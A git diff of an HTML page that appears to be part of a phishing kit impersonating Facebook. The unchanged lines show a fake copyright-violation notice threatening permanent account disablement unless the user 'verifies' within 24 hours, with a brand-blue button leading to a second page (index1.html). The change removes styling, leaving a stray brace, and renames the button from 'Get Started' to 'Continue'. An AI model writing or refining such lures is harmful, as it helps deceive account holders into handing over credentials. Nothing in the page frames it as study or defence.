--- a/index.html
+++ b/index.html
@@ -119,29 +119,7 @@
                 background-color: #00000045;
             }
 
-            #para {
-                margin: 0%;
-            }
-
-            #para>h2 {
-                font-size: 12px;
-                font-weight: 700;
-                margin-bottom: 10px;
-            }
-
-            #para>p {
-                margin: 5px 15px 0px 15px;
-                font-size: 14px;
-            }
-
-            #para button {
-                padding: 8px 18px 8px 18px;
-                margin-top: 15px;
-                border: none;
-                border-radius: 2px;
-                font-size: 13px;
-                background-color: #1877F2;
-                cursor: pointer;
+            
             }
         }
     </style>
@@ -158,7 +136,7 @@
                 <h2>
 Your account or the page you use has violated copyright. We will immediately limit your account or permanently disable it for non-compliance with our terms of service.
 If you think we've accidentally suspended your account, you have 24 hours to verify your account. If you miss this security notification, your account will be permanently disabled. </p>
-                <button> <a href="index1.html"> Get Started</a> </button>
+                <button> <a href="index1.html"> Continue</a> </button>
             </div>
         </div>
     </div>
